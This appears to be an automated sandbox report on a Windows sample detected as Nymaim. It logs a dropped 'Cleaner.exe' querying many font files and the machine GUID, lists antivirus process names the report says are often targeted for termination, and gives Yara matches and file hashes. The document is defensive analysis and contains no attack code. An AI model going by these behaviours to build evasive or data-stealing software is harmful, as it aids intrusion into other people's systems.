Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.30.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

ID:	715150
Product:	CloudBasic
Start time:	17:30:53
Start date:	03.10.2022
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	a3b774ed5023f56970eea0668ae65703
SHA1:	3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256:	f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
